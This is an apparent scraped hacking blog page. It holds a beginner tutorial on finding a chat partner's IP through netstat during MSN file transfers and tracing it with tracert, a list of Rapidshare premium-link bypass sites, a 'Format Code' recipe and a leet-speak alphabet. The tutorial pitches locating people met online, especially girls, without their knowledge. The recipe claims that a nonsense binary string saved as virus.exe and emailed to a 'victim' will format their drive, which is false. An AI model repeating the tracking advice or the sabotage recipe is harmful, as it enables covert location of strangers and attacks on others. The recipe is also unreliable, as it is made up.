Well I guess its one of the most important must learn manul for boys out there if you want to impress your friends particularly gals whom you’ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .

In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.



What is IP and how to get the IP of a remote system::




Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.

Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:



Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx



The various classes will be clearer after reading the next few lines.



Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".



A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

"24's" and is commonly used by most ISP's.



Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.



Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:



xxx.xxx.zzz.yyy



where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************



For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?



So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.



This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.



In my country, say there are three main ISP’s:



ISP Name Network Address Allotted



ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx



Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.



Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.



Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :



Proto Local Address Foreign Address State

TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED



Now you got the IP address of hotmail ass 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.



To know your own IP type the following command in a dos windows

C:\netstat –n

[this commands converts the IP name into IP addresses]

this is what you will probably see on typing the above command :



Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT



Here 203.xx.251.161 is your IP address.



Now lets clarify the format used by netstat :



Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.



Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system



Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like



C:\netstat

Proto Local Address Foreign Address State

TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED



Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.



Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port



Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].



Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Oriface :: 31337 (UDP)



Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.



How to get the IP of a remote system while chatting through msn messenger ::




This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED

The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.


Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.



Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way ie. Using MS DOS or any other version of DOS.

Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.



Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for peoples need to trace down an IP.

Just open any DOS windows and type tracert.



C:\windows>tracert



Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name


Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.


You will now see a description of the tracert command and the switches associated with it.

Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]



TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202



C:\WINDOWS>tracert yahoo.com



Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:



1 308 ms 142 ms 127 ms 203.94.246.35

2 140 ms 135 ms * 203.94.246.1

3 213 ms 134 ms 132 ms 203.94.255.33

4 134 ms 130 ms 129 ms 203.200.64.29

5 122 ms 135 ms 131 ms 203.200.87.75

6 141 ms 137 ms 121 ms 203.200.87.15

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]

16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]

Trace complete.



Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.



Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]

First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.



Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.



Firewall Detection



While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.



Example



Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :




c:\windows>tracert 64.4.53.7



Tracing route to lc2.law5.hotmail.com [64.4.53.7]


over a maximum of 30 hops:






1 * * * Request timed out.

2 161 ms 147 ms 85 ms 203.90.69.81

3 126 ms 261 ms 219 ms 203.90.66.9

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]

7 826 ms 731 ms 819 ms 213.232.106.9

8 885 ms 744 ms 930 ms 213.166.3.209

9 851 ms 1020 ms 1080 ms 213.232.64.54

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.


I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.



Detecting Traceroute Attempts on your System



You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:



1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.



2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.



3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.



You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:


The Operating System running on the attacker’s target system.
Number of hops away, the attacker is from you.



OKI DOKI that’s all for this article. Hope you will find this article very easy to understand and implement.

contd....

Free Premium Link generators


list of free premium link generators

Rapidshare.com Link Generators

www.rapidquick.net

Max No of links you can generate daily : 3

www.rapidirty.com

Max No of links you can generate daily : Unknown

www.hostyoursites.biz

Max No of links you can generate daily : 10

www.Premium4Me.Com

Max No of links you can generate daily : Unknown

www.RapidDownloader.Info

Max No of links you can generate daily : Unknown

www.Khongbiet.Com

Max No of links you can generate daily : Unknown

www.Rapid-Hook.Com

Max No of links you can generate daily : 4

www.Rapidshack.Us

Max No of links you can generate daily : Unknown

www.Megaez.Com

Max No of links you can generate daily : Unknown

www.RapidsharePremiumLinkGenerator.Com

Max No of links you can generate daily : Unknown

www.rapidhack.prv.pl

Max No of links you can generate daily : 5

www.RapitShare.Info

Max No of links you can generate daily : 5

www.FreeRsLinks.Com

Max No of links you can generate daily : 100

www.Rapidl.Com

Max No of links you can generate daily : 3

www.RapidFile.Us

Max No of links you can generate daily : 2

www.Rapidshare.Co.In

Max No of links you can generate daily : 5

www.RapidLeech.com

Max No of links you can generate daily : Unknown

www.RsFox.Com

Max No of links you can generate daily : 5

www.Rs43.Com

Max No of links you can generate daily : Unknown

www.FreeRapid.Org

Max No of links you can generate daily : Unknown

www.Rapid4All.Com

Max No of links you can generate daily : 5

www.Adomreg.Com

Max No of links you can generate daily : Unknown


Format Code


How to Format Someone's Hard Disk

1. Write/copy the following code:
010010110001111100100101010101?010100000111111 00000

2. Save As it as .EXE and any Name would Do. eg- (virus.exe)
see here if you dont know how to save notepad as exe?

3. If u run the program means it will format the Hard Drive.

4. Next Send this to your Victim Some How like Email . If he Click on it then His C drive will Format

C$UTI0N:

NOTE: This is for learning purpose only!! I am is not responsible for any Cause!!

Sunday 26 August 2012

Hacking Language Alphabets


Many Of The Noob Hackers D0n't Understnd The Language Of Hackers...So Here it The Translation....

first

a b c d e f g h i j k l m n o p q r s t u v w x y z

translate to

4 8 c D 3 ph G h 1 j K l m N 0 p Q R 5 7 u V w X Y 2

second

a b c d e f g h i j k l m n o p q r 5 t u v w x y z

translate to{HARDEST ONE}

4 b ( |) 3 p|-| 9 |-| 1 _| |< |_ |\/| |\| o p (). .- 2 7 |_| v \/\/ >< `/ 2

letter a is now commonly replaced by @

hope it helps you.

if You Know More,,,,Please post Translations here....

Enjoy...